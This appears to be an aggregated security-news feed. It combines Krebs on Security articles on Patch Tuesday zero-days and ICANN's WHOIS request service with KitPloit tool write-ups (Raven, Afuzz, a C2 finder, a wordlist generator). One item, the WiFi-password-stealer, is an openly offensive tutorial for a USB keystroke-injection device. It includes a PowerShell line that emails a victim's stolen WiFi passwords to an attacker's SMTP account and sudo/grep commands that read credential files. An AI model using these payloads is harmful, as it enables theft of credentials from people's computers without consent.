WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R — February 15th 2024 at 11:30


WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.


Done
  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

Installation

From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

From Dockerfile

You can run this application on a container after build a Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

From DockerHub

You can run this application on a container after pulling from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

Usage
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.



☐ ☆ ✇ Krebs on Security

Fat Patch Tuesday, February 2024 Edition

By: BrianKrebs — February 13th 2024 at 22:28

Microsoft Corp. today pushed software updates to plug more than 70 security holes in its Windows operating systems and related products, including two zero-day vulnerabilities that are already being exploited in active attacks.

Top of the heap on this Fat Patch Tuesday is CVE-2024-21412, a “security feature bypass” in the way Windows handles Internet Shortcut Files that Microsoft says is being targeted in active exploits. Redmond’s advisory for this bug says an attacker would need to convince or trick a user into opening a malicious shortcut file.

Researchers at Trend Micro have tied the ongoing exploitation of CVE-2024-21412 to an advanced persistent threat group dubbed “Water Hydra,” which they say has being using the vulnerability to execute a malicious Microsoft Installer File (.msi) that in turn unloads a remote access trojan (RAT) onto infected Windows systems.

The other zero-day flaw is CVE-2024-21351, another security feature bypass — this one in the built-in Windows SmartScreen component that tries to screen out potentially malicious files downloaded from the Web. Kevin Breen at Immersive Labs says it’s important to note that this vulnerability alone is not enough for an attacker to compromise a user’s workstation, and instead would likely be used in conjunction with something like a spear phishing attack that delivers a malicious file.

Satnam Narang, senior staff research engineer at Tenable, said this is the fifth vulnerability in Windows SmartScreen patched since 2022 and all five have been exploited in the wild as zero-days. They include CVE-2022-44698 in December 2022, CVE-2023-24880 in March 2023, CVE-2023-32049 in July 2023 and CVE-2023-36025 in November 2023.

Narang called special attention to CVE-2024-21410, an “elevation of privilege” bug in Microsoft Exchange Server that Microsoft says is likely to be exploited by attackers. Attacks on this flaw would lead to the disclosure of NTLM hashes, which could be leveraged as part of an NTLM relay or “pass the hash” attack, which lets an attacker masquerade as a legitimate user without ever having to log in.

“We know that flaws that can disclose sensitive information like NTLM hashes are very valuable to attackers,” Narang said. “A Russian-based threat actor leveraged a similar vulnerability to carry out attacks – CVE-2023-23397 is an Elevation of Privilege vulnerability in Microsoft Outlook patched in March 2023.”

Microsoft notes that prior to its Exchange Server 2019 Cumulative Update 14 (CU14), a security feature called Extended Protection for Authentication (EPA), which provides NTLM credential relay protections, was not enabled by default.

“Going forward, CU14 enables this by default on Exchange servers, which is why it is important to upgrade,” Narang said.

Rapid7’s lead software engineer Adam Barnett highlighted CVE-2024-21413, a critical remote code execution bug in Microsoft Office that could be exploited just by viewing a specially-crafted message in the Outlook Preview pane.

“Microsoft Office typically shields users from a variety of attacks by opening files with Mark of the Web in Protected View, which means Office will render the document without fetching potentially malicious external resources,” Barnett said. “CVE-2024-21413 is a critical RCE vulnerability in Office which allows an attacker to cause a file to open in editing mode as though the user had agreed to trust the file.”

Barnett stressed that administrators responsible for Office 2016 installations who apply patches outside of Microsoft Update should note the advisory lists no fewer than five separate patches which must be installed to achieve remediation of CVE-2024-21413; individual update knowledge base (KB) articles further note that partially-patched Office installations will be blocked from starting until the correct combination of patches has been installed.

It’s a good idea for Windows end-users to stay current with security updates from Microsoft, which can quickly pile up otherwise. That doesn’t mean you have to install them on Patch Tuesday. Indeed, waiting a day or three before updating is a sane response, given that sometimes updates go awry and usually within a few days Microsoft has fixed any issues with its patches. It’s also smart to back up your data and/or image your Windows drive before applying new updates.

For a more detailed breakdown of the individual flaws addressed by Microsoft today, check out the SANS Internet Storm Center’s list. For those admins responsible for maintaining larger Windows environments, it often pays to keep an eye on Askwoody.com, which frequently points out when specific Microsoft updates are creating problems for a number of users.

☐ ☆ ✇ KitPloit - PenTest Tools!

Raven - CI/CD Security Analyzer

By: Zion3R — January 28th 2024 at 11:30


RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


What is Raven

The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

  • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
  • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
  • Query Library: We created a library of pre-defined queries based on research conducted by the community.
  • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

Possible usages for Raven:

  • Scanner for your own organization's security
  • Scanning specified organizations for bug bounty purposes
  • Scan everything and report issues found to save the internet
  • Research and learning purposes

This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

Why Raven

In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

  • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
  • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
  • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
  • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
  • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

Setup && Run

To get started with Raven, follow these installation instructions:

Step 1: Install the Raven package

pip3 install raven-cycode

Step 2: Setup a local Redis server and Neo4j database

docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to setup the environment is by running our provided docker compose file:

git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup

Step 3: Run Raven Downloader

Org mode:

raven download org --token $GITHUB_TOKEN --org-name RavenDemo

Crawl mode:

raven download crawl --token $GITHUB_TOKEN --min-stars 1000

Step 4: Run Raven Indexer

raven index

Step 5: Inspect the results through the reporter

raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.

Prerequisites

  • Python 3.9+
  • Docker Compose v2.1.0+
  • Docker Engine v1.13.0+

Infrastructure

Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

Usage

The tool contains three main functionalities, download and index and report.

Download

Download Organization Repositories

usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows

Download Public Repositories

usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000

Index

usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
--debug Whether to print debug statements, default: False

Report

usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...

positional arguments:
{slack}
slack Send report to slack channel

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)

Examples

Retrieve all workflows and actions associated with the organization.

raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

Scrape all publicly accessible GitHub repositories.

raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

raven index --debug

Now, we can generate a report using our query library.

raven report --severity high --tag injection --tag unauthenticated

Rate Limiting

For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:

  • Code search - 30 queries per minute
  • Any other API - 5000 per hour

Research Knowledge Base

Current Limitations

  • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
  • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
  • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
  • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

Future Research Work

  • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
  • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
  • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



☐ ☆ ✇ KitPloit - PenTest Tools!

WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R — January 2nd 2024 at 11:30


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


☐ ☆ ✇ Krebs on Security

ICANN Launches Service to Help With WHOIS Lookups

By: BrianKrebs — December 6th 2023 at 15:51

More than five years after domain name registrars started redacting personal data from all public domain registration records, the non-profit organization overseeing the domain industry has introduced a centralized online service designed to make it easier for researchers, law enforcement and others to request the information directly from registrars.

In May 2018, the Internet Corporation for Assigned Names and Numbers (ICANN) — the nonprofit entity that manages the global domain name system — instructed all registrars to redact the customer’s name, address, phone number and email from WHOIS, the system for querying databases that store the registered users of domain names and blocks of Internet address ranges.

ICANN made the policy change in response to the General Data Protection Regulation (GDPR), a law enacted by the European Parliament that requires companies to gain affirmative consent for any personal information they collect on people within the European Union. In the meantime, registrars were to continue collecting the data but not publish it, and ICANN promised it would develop a system that facilitates access to this information.

At the end of November 2023, ICANN launched the Registration Data Request Service (RDRS), which is designed as a one-stop shop to submit registration data requests to participating registrars. This video from ICANN walks through how the system works.

Accredited registrars don’t have to participate, but ICANN is asking all registrars to join and says participants can opt out or stop using it at any time. ICANN contends that the use of a standardized request form makes it easier for the correct information and supporting documents to be provided to evaluate a request.

ICANN says the RDRS doesn’t guarantee access to requested registration data, and that all communication and data disclosure between the registrars and requestors takes place outside of the system. The service can’t be used to request WHOIS data tied to country-code top level domains (CCTLDs), such as those ending in .de (Germany) or .nz (New Zealand), for example.

The RDRS portal.

As Catalin Cimpanu writes for Risky Business News, currently investigators can file legal requests or abuse reports with each individual registrar, but the idea behind the RDRS is to create a place where requests from “verified” parties can be honored faster and with a higher degree of trust.

The registrar community generally views public WHOIS data as a nuisance issue for their domain customers and an unwelcome cost-center. Privacy advocates maintain that cybercriminals don’t provide their real information in registration records anyway, and that requiring WHOIS data to be public simply causes domain registrants to be pestered by spammers, scammers and stalkers.

Meanwhile, security experts argue that even in cases where online abusers provide intentionally misleading or false information in WHOIS records, that information is still extremely useful in mapping the extent of their malware, phishing and scamming operations. What’s more, the overwhelming majority of phishing is performed with the help of compromised domains, and the primary method for cleaning up those compromises is using WHOIS data to contact the victim and/or their hosting provider.

Anyone looking for copious examples of both need only to search this Web site for the term “WHOIS,” which yields dozens of stories and investigations that simply would not have been possible without the data available in the global WHOIS records.

KrebsOnSecurity remains doubtful that participating registrars will be any more likely to share WHOIS data with researchers just because the request comes through ICANN. But I look forward to being wrong on this one, and will certainly mention it in my reporting if the RDRS proves useful.

Regardless of whether the RDRS succeeds or fails, there is another European law that takes effect in 2024 which is likely to place additional pressure on registrars to respond to legitimate WHOIS data requests. The new Network and Information Security Directive (NIS2), which EU member states have until October 2024 to implement, requires registrars to keep much more accurate WHOIS records, and to respond within as little as 24 hours to WHOIS data requests tied everything from phishing, malware and spam to copyright and brand enforcement.

☐ ☆ ✇ KitPloit - PenTest Tools!

C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R — December 4th 2023 at 11:30

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.


Search for c2 servers based on netlas (8)

Usage

To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to search at the google.com IP address on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t google.com -p 443 -s 1234567890abcdef

Release

To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

Docker

To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v

Source

To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.

Support

Name Support
Metasploit
Havoc
Cobalt Strike
Bruteratel
Sliver
DeimosC2
PhoenixC2
Empire
Merlin
Covenant
Villain
Shad0w
PoshC2

Legend:

  • ✅ - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support

Contributing

If you'd like to contribute to this project, please feel free to create a pull request.

License

This project is licensed under the License - see the LICENSE file for details.



☐ ☆ ✇ Krebs on Security

Microsoft Patch Tuesday, November 2023 Edition

By: BrianKrebs — November 14th 2023 at 23:00

Microsoft today released updates to fix more than five dozen security holes in its Windows operating systems and related software, including three “zero day” vulnerabilities that Microsoft warns are already being exploited in active attacks.

The zero-day threats targeting Microsoft this month include CVE-2023-36025, a weakness that allows malicious content to bypass the Windows SmartScreen Security feature. SmartScreen is a built-in Windows component that tries to detect and block malicious websites and files. Microsoft’s security advisory for this flaw says attackers could exploit it by getting a Windows user to click on a booby-trapped link to a shortcut file.

Kevin Breen, senior director of threat research at Immersive Labs, said emails with .url attachments or logs with processes spawning from .url files “should be a high priority for threat hunters given the active exploitation of this vulnerability in the wild.”

The second zero day this month is CVE-2023-36033, which is a vulnerability in the “DWM Core Library” in Microsoft Windows that was exploited in the wild as a zero day and publicly disclosed prior to patches being available. It affects Microsoft Windows 10 and later, as well as Microsoft Windows Server 2019 and subsequent versions.

“This vulnerability can be exploited locally, with low complexity and without needing high-level privileges or user interaction,” said Mike Walters, president and co-founder of the security firm Action1. “Attackers exploiting this flaw could gain SYSTEM privileges, making it an efficient method for escalating privileges, especially after initial access through methods like phishing.”

The final zero day in this month’s Patch Tuesday is a problem in the “Windows Cloud Files Mini Filter Driver” tracked as CVE-2023-36036 that affects Windows 10 and later, as well as Windows Server 2008 at later. Microsoft says it is relatively straightforward for attackers to exploit CVE-2023-36036 as a way to elevate their privileges on a compromised PC.

Beyond the zero day flaws, Breen said organizations running Microsoft Exchange Server should prioritize several new Exchange patches, including CVE-2023-36439, which is a bug that would allow attackers to install malicious software on an Exchange server. This weakness technically requires the attacker to be authenticated to the target’s local network, but Breen notes that a pair of phished Exchange credentials will provide that access nicely.

“This is typically achieved through social engineering attacks with spear phishing to gain initial access to a host before searching for other vulnerable internal targets – just because your Exchange Server doesn’t have internet-facing authentication doesn’t mean it’s protected,” Breen said.

Breen said this vulnerability goes hand in hand with three other Exchange bugs that Microsoft designated as “exploitation more likely:” CVE-2023-36050, CVE-2023-36039 and CVE-2023-36035.

Finally, the SANS Internet Storm Center points to two additional bugs patched by Microsoft this month that aren’t yet showing signs of active exploitation but that were made public prior to today and thus deserve prioritization. Those include: CVE-2023-36038, a denial of service vulnerability in ASP.NET Core, with a CVSS score of 8.2; and CVE-2023-36413: A Microsoft Office security feature bypass. Exploiting this vulnerability will bypass the protected mode when opening a file received via the web.

Windows users, please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

☐ ☆ ✇ KitPloit - PenTest Tools!

Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

By: Zion3R — November 10th 2023 at 11:30

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns


Features

  • Afuzz automatically detects the development language used by the website, and generates extensions according to the language
  • Uses blacklist to filter invalid pages
  • Uses whitelist to find content that bug bounty hunters are interested in in the page
  • filters random content in the page
  • judges 404 error pages in multiple ways
  • perform statistical analysis on the results after scanning to obtain the final result.
  • support HTTP2

Installation

git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install

OR

pip install afuzz

Run

afuzz -u http://testphp.vulnweb.com -t 30

Result

Table

+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+ -----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
